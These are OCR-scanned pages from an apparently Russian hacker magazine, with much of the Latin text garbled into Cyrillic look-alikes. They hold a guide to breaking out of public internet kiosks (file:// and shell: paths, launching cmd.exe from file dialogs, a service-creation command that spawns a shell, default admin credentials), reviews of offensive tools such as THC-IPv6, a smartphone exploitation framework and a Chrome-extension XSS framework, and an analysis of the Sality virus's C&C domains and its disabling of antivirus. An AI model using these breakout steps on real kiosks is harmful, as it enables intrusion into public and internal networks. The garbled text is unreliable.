• адресная строка браузера, если есть; 

• ІІ5В-порты; 

• контентсостороннихсайтов. 
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СПОСОБ ПЕРВЫЙ 

Итак, представим ситуацию. Перед нами 
интернет-киоск, установленный в аэропорту, 
который за скромные 5 долларов в час пред- 
лагает посерфить в Сети. Без оплаты доступен, 
как правило, какой-нибудь местный ресурс 
(сайт аэропорта, например). Попытки перейти 
на другие ресурсы заканчиваются редиректа- 
ми на просьбу заплатить. Когда перед глазами 
адресная строка браузера, самое первое, что 
приходит в голову, — это попытка посмотреть 
локальные ресурсы машины путем ввода 
банальной С Лѵѵіпсіоѵѵз. Скорее всего, джейл 
киоска запретит такой переход. Однако ребята 
из МісговоЙ подумали о тех, кто постоянно 
забывает, в какую сторону ставятся слеши 
в путях файловой системы, да и вообще, как 
эти пути выглядят. Именно поэтому в каталог 
ѵѵіпбоѵѵБ и папки размещения данных при- 
ложений можно попасть с помощью огромного 
количества способов: 

Рііе : /С : /міпбомБ 
Рііе : /С : \міп6омб\ 

Рііе : /С : \міп6омб/ 

Рііе :/С т/міп6омб 
Р і1е:/С:/міпбом5 
Рііе: /С: \міп6омб\ 

Рі1е:/С: ѴміпсІсмб/ 

Рііе : /Сі/міпбомБ 

Рі1е://С:/міпбом5 

Рі1е://С:\міпбом5/ 

б1е://С:\міпбом5 

С :/міп6омб 

С.:\ідгіпсІоиг!5\ 

С:\ыіпсІоы5 

С:/міпбом5/ 

С :/міп6омб\ 

%жтік% 

%ТМР% 

%ТЕМР% 

%5У5ТЕМРКІѴЕ% 

%5У5ТЕМКООТ% 

%АРРРАТА% 

%НОМЕРКІѴЕ% 

%НОМЕ5НАКЕ% 

Уже на данном этапе идея с блэклистами 
начинает хромать :). Тут же можно вспомнить о 
том, что ІЕ поддерживаеттакой замечательный 
протокол, как зЬеІІ: набрав в адресной строке 
что-нибудь типа 5ЬеІІ:ѴѴіпсІоѵѵз, ты вполне 
можешь получить доступ к заветному ехріогег. 
ехе. Еще немного примеров: 

Ббеіі : Рпобіе 
Ббеіі : Рго§гатРі1е5 
5бе11:5уБІ:ет 

БІіеІІ : СопігоІРапеІРоІбег 

В особо тяжелых случаях можно прибег- 
нуть к СІ_5Ю (ѴѴіпбоѵѵБ СІазв I сіепііііегз). Так, 
переход по адресу «5ЬеІІ:::{20б(Ше0-Заеа- 
1069-а2б8-08002Ь30309б}» тоже запустит 
ехріогег.ехе. 

Напомню, что всем системным каталогам в 
ѴѴіпбоѵѵз ставится в соответствие свой иден- 



тификатор класса (СІ_5Ю), используя который 
можно обращаться к нужным веткам ФС. 

В приведенном примере используется СІ_5Ю 
системной папки «Мой компьютер». 

Можно вообще не напрягаться с запо- 
минанием названий каталогов и СІ_5Ю'ов и 
просто набрать зеагсЬ-тз: в адресной строке 
(актуально для ІЕ опять же). 

ВТОРОЙ, НАИБОЛЕЕ ОЧЕВИДНЫЙ СПОСОБ 

Есть в ОС ѴѴіпбоѵѵз библиотека под названием 
Соттоп Оіаіодз. Как становится понятно из 
названия, она обеспечивает реализацию и 
отображение стандартных диалоговых окон 
в системе. Тех самых, что позволяют нам 
выбрать файл для загрузки и сохранения, 
выбрать шрифт, цвет и так далее. Очевидно, 
что с помощью таких диалоговых окон можно 
просмотреть содержимое файловой системы 
киоска, однако отчего-то некоторые забывают, 
что с помощью их также можно и запускать 
произвольные приложения (РіІеѴіеѵѵ Сопігоіз 
тому виной). Собственно, вот и вектор: 

1. Находим любой элемент на сайте, который 
откроет диалоговое окно (например, кно- 
почка «АиасЬ» в форме с обратной связью); 

2. Переходим в каталог С :\ѴѴ і п сі оѵѵзХзу зіе т 3 2\; 

3. Клик правой кнопкой по стсі.ехе — > От- 
крыть. 

Не работает? Тогда что-то из этого обяза- 
тельно выполнится: 

соттапсі . сот 
міп.сот стсі.ехе 
міп.сот соттапсі. сот 
І_оаббх.сот Біагі.ехе 

вс сгеаіе іеБІБѴс Ьіпра1:Іі="стб /К зіагі" \ 
1:уре=омп Іуре=іп1:егас1: 

Іоаббх . сот стб . ехе 
Іоаббх . сот с от тапсі. сот 
Біагі; Іоаббх.сот стсі.ехе 
Бііагі: Іоаббх.сот соттапсі. сот 
Бііапі: Іоасібх.сот стсі.ехе 
%СОМ5РЕС% 

Найти в терминале функционал, который 
отобразит нам необходимое диалоговое окно, 
достаточно просто. Как вариант, можно просто 
поискать РОЕ- или бос-файлы, используя 6111 



самого киоска. Скорее всего, для отображения 
найденных файлов терминал с удовольствием 
запустит ѴѴогб или АсгоЬаІ Реабег, ну а дальше 
уже дело техники: «Файл — ► Открыть». Также 
с помощью данных диалоговых окон можно и 
файлы загружать со своего сервера в Сети (вы- 
гружать, кстати, тоже). 

К слову, о запуске новых процессов. Вспом- 
ним о протоколах, многие из них обрабатыва- 
ются приложениями, отличными от браузера, 
так почему бы не использовать их: 

Маіііоі/І 
Саіііо: // 

ІМемБ \Ц_ 



НСР: / / 

Теіпеі:// 

К1о§і п : / / 

ЮАР:// 

ММ5: // 

5КУРЕ : // 

5ІР:// 

Ріаѵ: // 

Біеат : // 

(Зиіскііте:// 

Так, 16 РБ Ьср://сЬрк_пуа5ба запустит «Неір 
апб Биррогі Сепіег», в котором есть подробная 
инструкция о том, как пользоваться командной 
строкой, и любезно предоставлена ссылка для 
ее запуска. 

СПОСОБ ТРЕТИЙ. КЛАВИАТУРА 

С клавиатурой ситуация простая: 

• естьполноценная клавиатура. Идеальный 
вариант, который встречается нетакчасто; 

• клавиатура есть, однакочастьклавиш на 
ней недоступна. Вариантпохуже, однако не 
фатальный, поскольку и без всяких ТАВ'ов и 
ѴѴіп-клавиш можнообойтись; 

• клавиатуры нет. Самый грустный вариант. 
Используется виртуальная клавиатура ПО 
киоска. Однако на таких клавиатурах все же 
можно найти необходимые символы (<, >,/,\, 

Опять же использовать хоткеи — первое, 
что приходит в голову. Наиболее популярные 
варианты, конечно, закрыты (хотя попадались 




Несмотря на все ограничения, на обоих терминалахудалось добраться до Ехріогег'а 
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Как открываются киоски 
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® Справка и поддержка 
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^ Спросить Параметры ▼ 



соттапсі рготрі; 
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Открытие окна командной строки 

Командная строка - точка входа для ввода компьютерных команд в окне 
командной строки. Командная строка позволяет выполнять задачи без помощи 
графического интерфейсаѴѴіпсІоѵѵ5. Дополнительные сведения о командной 
строке см в разделе Командная строка: вопросы и ответы. 

* Щелкн ите этот значок,, что бы откр ыть ко м а н дную стр о ку . 

Примечание 

* Открыть окно командной строки можно другим способом. Нажмите 
кнопку ПускіГѴ В поле поиска введите Командная строка,, затем в списке 
результатов щелкните Командная строка. 



Теперь у нас есть доступ к системе 



Справка может быть крайне полезной для доступа к командной строке 



мне киоски, которые вполне себе умирали по- 
сле <АК+Р4>), однако разного рода сочетания 
(<СігІ+І_>, <СігІ+0>, <СігІ+І>, <АК+Р>) вполне 
себе работают и позволяют наоткрывать 
каких-нибудь новых окошек, из которых пря- 
мой путь к ехріогег.ехе. Про залипание клавиш 
также не стоит забывать. Пять раз жмем 
<5ЫЙ> и радуемся появившемуся окну. 

СПОСОБ ЧЕТВЕРТЫЙ. АДМИНКА 

Админить терминалы, как ни странно, надо, 
конфигурировать тоже, именно поэтому в 
подавляющей массе софта для киосков есть 
шорткаты для входа в административный ин- 
терфейс. Узнать эти шорткаты — дело неслож- 
ное, особенно если удалось узнать производи- 
теля ПО киоска или терминала. В юзергайдах 
к устройствам подробно описывается, где эти 
самые админки находятся и как к ним досту- 
чаться. Там же рядышком лежат и стандартные 
креды на вход в интерфейс администратора, 
которые почему-то так не любят менять по- 
купатели этого самого ПО. 

Чаще всего форма входа в админку вы- 
зывается либо по хоткею (рандомное нажатие 
на кучу клавиш ;)), либо после совершения 
определенных действий в интерфейсе, напри- 
мер ввода «специального» номера (нередко 
этими номерами оказываются десять единичек 
или нуликов) в поле для мобильного номера. 
Невидимые элементы по углам экрана также 
излюбленное место для шортката к админке. 

СПОСОБ ПЯТЫЙ. ДЛЯ ЛЕНИВЫХ 

Очень удобно слегка подготовиться перед под- 
ходом к киоску. Почему бы не сделать ресурс в 
интернете, на котором заранее будут располо- 
жены все необходимые элементы для вызова 
разного рода менюшек и приложений? 

Точно так размышлял Пол Крэйг (РаиІ 
Сгаід), который и реализовал эту идею в виде 



замечательной тулзы ІКАТ (Іпіегасбѵе Кіозк 
Аиаск ТооІ), доступной по адресу ікаІ.Ьа.скеб. 
пеЕ . Суть ее работы очень проста. Атакующий 
заходит с киоска по указанному выше адресу, 
жмет «Аиіо-Наск» и через 30 секунд наслаж- 
дается видом консоли на экране. 

Помимо автохака, интерфейс позволяет 
сделать все самому ручками, удобно нажимая 
на ссылочки, заботливо сгруппированные по 
разделам. Вот тут глаза даже слегка раз- 
бегаются, настолько богат функционал. Все 
возможности разделены на десять категорий 
(помимо автоэксплуатации): 

• информация о киоске. В данном разделе 
можно узнать ІР-адрес киоска, версию ОС, 
используемый браузер итакдалее; 

• ссылки на локальнуюФС; 

• ссылки на вызов разнообразныхдиалоговых 
окон; 

• ссылки на различные ІІРІ-схемы, с возмож- 
ностью автоматического определения тех из 
них, которые работают на данной машине; 

• ссылки на файлы различныхтипов, дляза- 
пуска сторонних приложений; 

• плагины иаддоны кбраузеру; 

• ХШ-ссылки для Рігеіюх. С их помощью можно 
получитьдоступ кразличным конфигураци- 
онным панелямданногобраузера; 

• раздел сразличными іКАТТооіз для эксплуа- 
тации; 

• раздел, в котором собраны ссылки на баги, 
призванные крешнуть браузер л ибо непо- 
средственно процессы ПО киоска. 

Описывать все возможности инструмен- 
та не вижу особого смысла, нужно просто 
разок зайти и посмотреть самому: различ- 
ные баѵа-апплеты, АсНѵеХ-компоненты, 
баѵаЗсгірІ-консоль, аддоны для браузера, 
которые запускают командные строки, 
таск-менеджеры, редакторы реестра и так 



далее — все это в изобилии присутствует 
на одном ресурсе. 

Или вот, например, если на киоске установ- 
лен (Жісе, то можно просто скачать бос-файл 
(поддерживаются также форматы босх, хіз, 
хізЬ, хізт, хізх) с приаттаченным внутри него 
стб.ехе, который байпасит І_осаІ (Згоир Роіісу и 
ВоЙѵѵаге Резігісііоп Роіісіез. 

Автор ресурса предлагает просто загружать 
на диск киоска іКАТ-агент (например, с помо- 
щью флеш-даунлоадера), который попытается 
поднять свои привилегии и отдать админскую 
консольку. Все для вашего удобства, сэр. 

ВМЕСТО ЗАКЛЮЧЕНИЯ 

Изучая различные киоски и терминалы, я 
натыкался на самую разнообразную инфу, 
которую эти самые киоски бережно склади- 
руют в каталогах с логами. Пожалуй, доверять 
таким аппаратам номер своей кредитки пока 
еще рановато. 

Не стоит забывать о том, что интернет- 
киоски, кроме того что содержат массу инте- 
ресных данных, являются также отличными 
площадками для дальнейших атак, направ- 
ленных во внутреннюю сеть (аэропорта, на- 
пример). А рядом с этими самыми терминалами 
вполне себе могут валяться розетки, свичи и 
І_АІ\І-кабели, которые также можно исполь- 
зовать для подключения в сеть чего-нибудь 
описанного в недавней статье «Хакерский 
чемоданчик». 

Собственно, на этом и все. Как ты мог 
заметить, дело это не хитрое, но доволь- 
но увлекательное, особенно когда нечем 
заняться или хочется скрасить очередной 
поход к терминалу оплаты. 

Не забывай, что мы с тобой хорошие ре- 
бята и ни в коем случае не станем использо- 
вать полученные знания в своих корыстных 
целях. Чудес! зс 
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СОФТ ДЛЯ ВЗЛОМА И АНАЛИЗА БЕЗОПАСНОСТИ 




Автор: 

51 асН & І_і и 

ині_: ѵѵѵѵѵѵ.зІасЫіи. 
сот/гезоигсезДооІз/ 
доодІе-Иаскіпд- 
сііддііу-ргоіесі: 
Система: ѴѴіпсІоѵѵз 




Рііе ЕсІаЬ Уіем ІеагсЬ 
$ і-^і а ; -/о&ѵт 1 
.^кріоііб ѵі ,9 Гс) 201 

; /шхріъіхь іпіе 

РЧм Гогтіі Г Ѵ4 

Ноіі : СІіііІ Сан ЕярІоіСдЬ 
1Т а ^уз т етз, ѵиіпсгав 



Автор: 

тнс 

икі_: ѵѵѵѵѵѵ.Щс.огд/ 
Щс-ірѵб 

Система: І_іпих 





Автор: 

Зеогдіа ѴѴеісІтап 
ЦКІ.: ѵѵѵѵѵѵ.ЬиІЬзеси- 
гііѵ.сот/зтагТрНопе- 
репІезМгатеѵѵогк 

Система: Ыпих 




АОѴАКІСЕО 60061_Е НАСКІМ6 

Все знают, что такое боодіе Ьаскіпд, насколь- 
ко он прост и полезен, но мало кто в курсе, 
что он не стоит на месте и развивается. 
Программа 5еагсЬ0ідді*у из проекта боодіе 
Наскіпд йіддііу — самое большое тому под- 
тверждение. Программа представляет собой 
набор из 11 подпрограмм, каждая из которых 
имеет свой выделенный функционал для 
решения определенных задач, основывающих- 
ся на поиске. боодІейіддДу применяется для 
классического боодіе Ьаскіпд, ВіпдОіддіІу — 
то же самое, но на основе поисковика Віпд. 
РІазбОіддДу — отличный помощникдля мас- 
сового поиска уязвимостей во РІазЬ-файлах. 
0І_Р0ідді*у — аналог 01_Р-системы на основе 
поисковиков. ЫпкРготОотаіп — іюоіргіп* 
инструмент на основе ссылок на сайте. 
СосІеБеагсЬ біддііу поможет в массовом поиске 
уязвимостей в проектах, располагающихся 
на боодіе бобе, МБ СобеРІех, БоигсеРогде, 
біЖиЬ и так далее. МаІѵѵагеОіддіІу 
и ВіпдВіпагуМаІѵѵаге — хорошие помощники 
для идентификации ссылок, ведущих на вре- 
доносные сайты. Рог*5сап — простой пассив- 
ный сканер портов. ІМоІІпМуВаскѴагсІ при- 
годится для поиска критической информации 
на сторонних сайтах типа РазіеВіп, ѴоиТиЬе, 
Тѵѵіиег, йгорЬох, МісгозоЙ БкуОгіѵе и боодіе 
Оосз. 5Н00АІЧ йіддііу предоставляетудобный 
интерфейс к сервису 5РЮ0АЫ. 



НА АБОРДАЖ ІРѴ6-СЕТИ 

ТНС-ІРѴ6 — это полный набор инструментов 
для проведения атак на слабые стороны 
протоколов ІРѵб и ІСМР6 от легендарной 
хак команды ТЬе Наскег'з СЬоісе. Программа 
представляет собой набор атакующих моду- 
лей для ІРѵб-сетей и является незаменимой 
вещью во время пентестов в ІРѵб-сетях. Функ- 
ционал программы не может не радовать: 

• атака «Человек посередине»; 

• сканирование сети; 

• обнаружение новых устройств; 

• подделка устройств; 

• флуд; 

• перебор грубой силой; 

• эксплойты; 

• отказ в обслуживании; 

• конструктор пакетов; 

• фаззеры. 

И это далеко неполныйсписок — публич- 
ная версия инструмента распространяется 
не со всеми существующими модулями, 
но при отправке патчей и новых модулей мож- 
но получить доступ к приватной версии про- 
граммы с более чем 50 модулями. Инструмент 
активно развивается, и тренинги по безопас- 
ности ІРѵб-сетей идут с использованием 
данного инструмента на таких конференциях 
по информационной безопасности, как44Соп, 
Наск іп *Ье Вох, 5есигі*у 2опе, СапБесѴѴез*. 



СМАРТФОНЫ ПОД ПРИЦЕЛОМ 

Популярность мобильных устройств растет, 
как и интерес хакеров к их (без)опасности. 

Так что релиз 5таг*р1юпе Реп*ез* Ргатеѵѵогк 
(БРР) на ВІаск Наі; АгзепаІ совсем не 
удивителен. Инструмент позволяет оценить 
удаленные уязвимости, проводить атаки 
на клиента, атаки социальной инженерии, 
атаки после эксплуатации и поднятия 
привилегий. В составе текущей версии: 

• БРР-консоль; 

• БРРѴѴеЬбШ; 

• БРР Апбгоіб-приложение; 

• 5РР Апбгоіб-агент. 

Сам фреймворк написан на РегІ и хранит все 
настройки в простом конфигурационном 
файле. Консольный интерфейс по принципу 
работы напоминает Ме*азрІоі*. В инструменте 
уже реализованы агенты для ОС Апбгоіб и Ю5 
(агент для ВІаскВеггу в разработке). Агент 
представляет собой роз* ехрІоі*а*іоп приложение 
для мобильного устройства, с помощью которого 
можно: повышать свои привилегии, собирать 
информацию, удаленно управлять смартфоном 
(например, отправлять 5М5). Агент можно 
установить на телефон жертвы как дав прямую 
ссылку на него в надежде на бестолковость 
пользователя, так и проэксплутировав 
уязвимость в ѴѴеЬКі* (СѴЕ-201 0-1 759). БРР 
разработан за счет гранта РАРРА СуЬег Раз* Тгаск. 
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7 утилит для исследования безопасности 




Автор: 

ѴазапіНкитаг 

ѴеІауисІНат 

ЦРІ_: Боигсеіогде. 
пеі/ргоіесіз/хеіе- 
піитзесигіі 

Система: ѴѴіпсІоѵѵз/ 
Ыпих 



ИМИТАЦИЯ ПОЛЬЗОВАТЕЛЯ ДЛЯ П0ИСКАХ55 

0ѴѴА5Р Хеіепіит базируется на фреймворке Веіепіит для автомати- 
зации действий пользователя в браузере. Беіепіит предоставляет 
несколько вариантов для идентификации элементов интерфейса, 
сравнения ожидаемого и наблюдаемого поведения тестируемого 
приложения. Одной из ключевых особенностей Беіепіит является 
возможность запуска одних и тех же тестов в различных браузе- 
рах. И данный функционал было грех не использовать для поиска 
уязвимостей в веб-приложениях. Это и сделали разработчики 
Хеіепіит — они автоматизировали поиск Сгозз 5іІе Всгірііпд (Х55) 
уязвимостей (только это пока на данный момент). Для работы 
инструмента нужно ввести адрес интересующего приложения 
и провести его сканирование на наличие других страниц. Хеіепіит 
определит также все доступные поля для ввода, части из которых 
можно заранее задать предопределенные значения по маске, чтобы 
ускорить процесс тестирования. Потом оставить только те страни- 
цы, которые необходимо протестировать. Затем выбираем исполь- 
зуемые векторы атак и при необходимости добавляем и свои. После 
этого уже можно начинать тестирование, а результаты его можно 
увидеть в веб-интерфейсе. 




Автор: 

Кггуз 2 Ы Коіоѵѵісі 

ЦКІ.: НЦрз://діЩиЬ. 
сот/коіо/хззсНеі 

Система: ѴѴіпсІоѵѵз/ 
Ыпих/Мас 





Автор: 

І_иса Сагеиопі 

ЦКІ.: сосіе.доодіе. 
сот/р/Ыагег 

Система: ѴѴіпсІоѵѵз/ 
Ыпих/Мас 





Автор: 

І_ике ^ппіпдз 
ЦКІ: ІаЬз.тѵѵгіп- 
іозесигііу.сот/ 
аззеІз/269/іпсод- 
пі 1 о 2 . 2 Ір 

Система: ѴѴіпсІоѵѵз 




УПРАВЛЯЕМ СЕССИЯМИ В СНКОМЕ 

Речь пойдет о полноценном фреймворке, 
с помощью которого удобно эксплуатировать 
Х55-уязвимости в расширениях СЬготе. 
Расширение СЬготе — это веб-приложение 
с определенными привилегиями в системе, 
что делает его более привлекательным для 
взлома. В зависимости от манифеста, рас- 
ширения имеют право получать контент любой 
посещенной веб-страницы и собирать ІІРІ_'ы 
в режиме инкогнито, исполнять скрипты в кон- 
тексте определенного веб-сайта (глобальный 
Х55), делать скриншоты вкладок, отслежи- 
вать историю серфинга и куки, иметь доступ 
к закладкам, даже менять настройки прокси- 
сервера. При эксплуатации Х55 вы получаете 
возможность произвести все это на компью- 
тере пользователя. Достаточно использовать 
СЬготе АРІ. Коммуникация с АРІ трудоемка, 
поэтому автор разработал фреймворк Х55 
СЬеР — СЬготе Ехіепзіоп Ехріоііаііоп, который 
делает основную работу. Фактически это экви- 
валент известного инструмента ВеЕР, который 
превращает веб-приложение с найденной 
Х55-уязвимостью в «зомби», выполняюще- 
го удаленные команды. Рекомендую перед 
использованием фреймворка ознакомиться 
с презентацией автора «АбѵапсесІ СЬготе 
Ехіепзіоп Ехріоііаііоп: І_еѵегадіпд АРІ роѵѵегз 
іюг Веиег ЕѵіІ» с конференции ВІаск На! ІІ5А 
2012 . 



БИНАРНЫЙ ФОРМАТ АМР НЕ ПОМЕХА 

Асііоп Меззаде Рогтаі (АМР) — это бинарный 
формат, используемый для сериализации 
графовых объектов, таких как АсІіопВсгірІ- 
объекты и ХМІ_, или для отправки сообщений 
между АсІоЬе РІазЬ клиентом и удаленным 
сервисом (обычно РІазЬ Месііа сервер). 

Язык АсІіопВсгірІ 3 предоставляет классы 
для кодирования и раскодирования АМР- 
формата. Данный форматтакже можно часто 
встретить в сочетании с АсІоЬе РТМР, чтобы 
установить соединение и передать команды 
управления при предоставлении потокового 
контента. В Іагег — это настраиваемый 
генератор АМР-сообщений с возможностью 
фаззинга. Программа выполнена в виде Эаѵа- 
плагина для всем хорошо известного Вигр 
5иіІе. ВІагег упрощает процесс тестирования 
безопасности АМР-приложений и позволяет 
полностью контролировать процесс общения 
между клиентом и сервером. Программа 
генерирует Эаѵа-объекты из сигнатур 
методов через Эаѵа-рефлексию и эвристики. 
Для удобства при ручном тестировании 
встроен ВеапБЬеІІ. В наличии поддержка 
серверных Эаѵа-технологий для передачи 
данных (АсІоЬе ВІагейБ, АсІоЬе ЫѵеСусІе йаіа 
Вегѵісез, СгапіІеОВ и прочие). Обо всей кухне 
тестирования АМР смотри в докладе «АМР 
ТезЬпд Масіе Еазу!» с конференции ВІаск Ріа* 
115А 2012. 



ИГРАЕМ ТОКЕНАМИ ДОСТУПА 
В ѴѴІШ0ѴѴ5 

Іпсодпііо — это инструмент от известной ис- 
следовательской лаборатории МѴѴР І_аЬз для 
манипуляций с токенами доступа в ѴѴіпсІоѵѵз. 
Инструмент может быть полезен как пентесте- 
рам, так и консультантам по безопасности с си- 
стемными администраторами. Каждый процесс 
в ѴѴіпсІоѵѵз имеет свой контекст безопасности, 
который хранится в объекте под названием то- 
кен доступа (ассезз Іокеп). Токен доступа содер- 
жит идентификаторы безопасности и учетные 
данные для процесса. По умолчанию потоки не 
имеют собственных токенов доступа, но могут 
его запросить и использовать — имперсонизи- 
роваться, что позволяет им работать в рамках 
полученного контекста безопасности. Как раз 
данную особенность ОС и использует рассма- 
триваемый инструмент, перехватывая токен за- 
регистрированного пользователя в системе, при 
этом в системе может стоять патч М509-01 2 для 
изоляции служб ѴѴіпсІоѵѵз и это никак не скажет- 
ся на работоспособности данного инструмента. 
Во второй версии инструмента исправлен ряд 
ошибок и добавлено несколько нововведений: 

• мультихостовость и мультипоточность; 

• удобный вывод; 

• Оиіеі-режим; 

• СІеапир-режим; 

• поиск 5У5ТЕМ эквивалентных привилегий; 

• интерпретация йепу-ОпІу 5Ю. 
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МАЮТАКЕ 



Иллюстрации компании Зутапіес 
Алексей Панкратов, технический консультант Бутапіес 





На протяжении девяти лет Баіііу остается одним из наиболее опасных и труд- 
ноудаляемых вирусов. Пару лет назад мы писали о том, как распознавать 
полиморфизм и обфускацию кода на его примере. Сейчас, с появлением новых 
его версий, пора обобщить все то, что известно о нем на настоящий момент. 



ПОЛИМОРФНЫЙ, 




ПОЛНАЯ 
БИОГРАФИЯ 
И АНАТОМИЯ 
ВИРУСА 
БАНТУ Ь 
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Полиморфный, дерзкий и живучий 



История 



2003-2004: РАННИЕ ВЕРСИИ 



Первое появление вируса Баіііу было зарегистрировано в июне 
2003 года. В ранних версиях Баіііу заражал исполняемые файлы 
путем добавления своего кода, упакованного с помощью ІІРХ. В со- 
став вируса входили процедуры кражи информации, сбора вводи- 
мых данных (через йИ-кейлоггер), паролей, хранящихся в реестре, 
и настройки сііаі-іір-соединения. Украденные данные отправлялись 
на электронную почту атакующего с использованием различных 
БМТР-серверов, расположенных, что характерно, в России. 

Ранние версии вируса отличались заметной простотой: только 
базовые алгоритмы заражения файлов, в отличие от более про- 
двинутых коллег-вирусов. Сам вирус и структура передаваемых 
данных составляли единое целое. Автор не предусмотрел способов 
для их обновления. 

Методы передачи собранных данных злоумышленнику также не 
блистали замысловатостью: адрес электронной почты был жестко 
прописан в коде вируса. 



2004-2008: УСОВЕРШЕНСТВОВАНИЯ 



С 2004 по 2008 год автор много работал над усовершенствованием 
своего создания. Детальное описание всего множества вариан- 
тов вируса, появившихся в этот период, выходит за рамки данной 
статьи. Тем не менее небезынтересно отметить, что сама мето- 
дика инфицирования заметно модифицировалась, а вирус стал 
полиморфным без изменения точки входа (техника епігу-роіпі 
оЬзсигіпд), делая тем самым процесс обнаружения и излечения 
значительно более трудоемким. 

Вредоносные функции были выделены из вируса в отдельные 
модули, которые могли дополнительно загружаться с ряда ІІРІ_- 
адресов, прописанных в коде вируса. 



ОТКУДА ПОЯВИЛСЯ 5АЫТУ? 



Вопрос «откуда появился Баіііу?» получает неожиданно быстрый 
и простой ответ: «Баіаѵаі Сііу». Можно предположить, что сам автор 
родом из этого российского города. Также вирус содержит никнейм 
автора — «Бесіог» и слово «Кики». 



Версия 3.09, которая была наиболее активна в 2006 году, — 
хорошая иллюстрация этих усовершенствований. В нее также 
включены процедуры противодействия механизмам обеспечения 
безопасности: блокировка или отключение некоторых межсетевых 
экранов, утилит и антивирусных программ. Вирус подключался 
к НТТР-серверу (ѵѵѵѵѵѵ.ЬЗпзІк.іпІю, ѵѵѵѵѵѵ.дІікскѵпБЗзсІзаІ.іпІю или 
ѵѵѵѵѵѵ.і'бсізі іккк4сІ.іпі : о), который возвращал закодированный список 
вредоносных модулей для выполнения на зараженном компьютере. 
Автор также стал более «тихим», хотя слово «кики» по-прежнему 
встречается (рис. 2). 



2008 — НАСТОЯЩЕЕ ВРЕМЯ: 
УЛУЧШЕННАЯ СХЕМА РАСПРОСТРАНЕНИЯ 



В один прекрасный момент в 2008 году, а может быть, и в конце 
2007-го автор решил устранить самое слабое место в механизме 
распространения — жестко прописанные в коде вируса ІІРІ_- 
адреса для загрузки дополнительных вредоносных модулей. Эти 
адреса можно было легко заблокировать, из-за чего вирус не мог 
загружать данные модули и фактически был нейтрализован 
(но не полностью обезврежен) на свежезараженных компьютерах. 

В качестве решения этой проблемы автор добавил модуль реег- 
Іо-реег, который ниже мы рассмотрим подробнее. 




«т нттрдд 

ию5т ■ ѵмѵ.ІівЗгни.ІпРа 



МТТР/1.1 200 ОМ 

мте: ггі, оі ліі гаи дат 

Х-етачтігі-іу: РНР/і.1.3 
й-іІпкЬаІй: гпі1иа.гй-5ІпккюТе 

Сепп«ЛІ0Рі[ -сімв 
саптйгсг-туірі: «я/ИитЛ;: 



Рисунок 2. Соединение Баіііу ѵ3.09 с С&С сервером (соттапсі апсі сопігоі зегѵег) 



И.і.г,ъР.,Іи.'. , 'глі ь 




Рисунок 1. Письмо с собранной информацией, сгенерировано Баіііу ѵ2.93 



Рисунок 3. Мьютексы на зараженном Баіііу компьютере 
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МАШАКЕ 



Архитектура 

Для лучшего понимания принципов работы рассмотрим общую 
архитектуру последних версий вируса Баіііу (2008 год и позже). 
Все модули являются полунезависимыми и работают в отдельных 
потоках (іЬгеасЫ. 



МОДУЛЬ ВНЕДРЕНИЯ 



5а Іііу внедряет копию своего кода во все запущенные процессы 
за исключением тех, которые принадлежат учетным записям 
«зузіет», « I о с а I зегѵісе» и «пеіѵѵогк зегѵісе». Если процесс при- 
вилегированный, Заіііу пытается получить отладочные (йеЬид) 
привилегии и повторяет попытку внедрения. 

Если экземпляр Баіііу завершает работу, самостоятельно или 
нет, то в этом случае один из уже внедренных процессов пере- 
хватывает управление. Для предотвращения множественного 
внедрения в тотже процесс создаются мьютексы с именами 
«<РгосеззМате>М_х_», где х — десятичное значение Ргосезз Ю. 
Большое количество таких мьютексов в системе — надежный по- 
казатель того, что она заражена Баіііу (рис. 3). 



МОДУЛЬ ЗАЩИТЫ 



Этот модуль защищает Баіііу от антивирусного ПО. Для предот- 
вращения загрузки ОС в режиме защиты от сбоев (Баію Ьооі тобе) 
вирус удаляет из реестра ключи и значения в следующих ветках: 

НКЕУ_СІІ88ЕМТ_ІІ5Е8\5у5-1:ет\Сиппеп-1:Соп-1:по15е-1:\Соп1:по1\5а-РеВоо-1: 

НКЕУ_ЮСАІ_МАСНІМЕ\5у5-1:ет\Сиппеп-1:Соп1:по15е-1:\Соп-1:по1\5а-РеВоо1: 

Блокируется работа служб множества антивирусных программ. 
Ранние версии Баіііу вели себя даже более агрессивно и просто 
удаляли эти службы из системы. 




Рисунок 4. Структура вируса и процесс запуска 




Рисунок 5. Географическое распределение С&С серверов, используемых 
дополнительными вредоносными модулями 
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Рисунок 6. Локальный список пиров 



Вирус также внедряет драйвер ядра. Этот драйвер добавляется 
под псевдослучайным именем в папку %5узІет%\бпѵегз. Создает- 
ся служба с запуском «по требованию». Вне зависимости от вариа- 
ций имя службы одно и то же — «атзіпі32». Драйвер играет три 
различные роли: 

• Уничтожитель процессов (ргосеззкіІІег):5аІіІу непрерывно скани- 
руетзапущенные процессы, несли имя процесса входитвсписок 
защитного ПО, то та кой процесс останавливается. Сам список 
жестко прописан в коде вируса. Для обхода антивирусной самоза- 
щиты все процессы уничтожаются драйвером на уровне ядра. 

• Фильтр пакетов (раскеНіІІег): драйвер регистрирует функцию 

«I РРіІІег СаІІЬаск гоиііпе» путем отправки контрольного запроса 
І0СТЕ_РР_5ЕТ_ЕХТЕМ5І0І\І_Р0ІІ\ІТЕВ в драйвер ІРРііМэта 
функция работала в ѴѴіпсІоѵѵз ХР/2003/2000, но в Ѵізіа и более 
поздних версияхуже не используется). Благодаря этой функции 
Баіііу мог отбрасывать ІР-па кеты, которые соответствовали 
строчному шаблону адресов сайтов производителей ПО обе- 
спечения безопасности. В результате пользовательне могзайти, 
кпримеру, насайтБутапІес.сот. 

• Драйвер также мог блокировать входящий и исходящий трафик 
БМТР-серверов. Этот функционал реализовывался модулем 
вируса, работающего в режиме пользователя, изапускался по 
команде от оператора ботсети. В более поздних версиях вируса 
этот модуль не использовался, хотя его код сохранился. 



МОДУЛЬ ЗАРАЖЕНИЯ 



Модуль заражения отвечает за размножение вируса. Для инфици- 
рования рассматриваются несколько кандидатов: 

• Файлы, перечисленные в ветке реестра НКЕѴ_СІІВРЕІ\ІТ_ІІ5ЕВ\ 
БоНѵѵаге\МісгозоН\ѴѴіпбоѵѵ5\5ЬеІІМоПоат\МІІІСасЬе. Эта 
ветка содержит«общие имена» (Соттоп патез) приложений, 
которые использует Ехріогег при группировке значков в панели 
задач. Как побочный эффект — М 1)1 СасЬе является репозитори- 
ем практически всех приложений, установленных в системе. 

• Классический вариант: заражаются файлы в ключах за пуска 
(Рип кеуз) веток: 

НКЕѴ_СІІККЕМТ_ІІ5ЕК\5о-Р1:іА/аге\Місго50-Р'1:\ІлІіпбоіл/5\ 

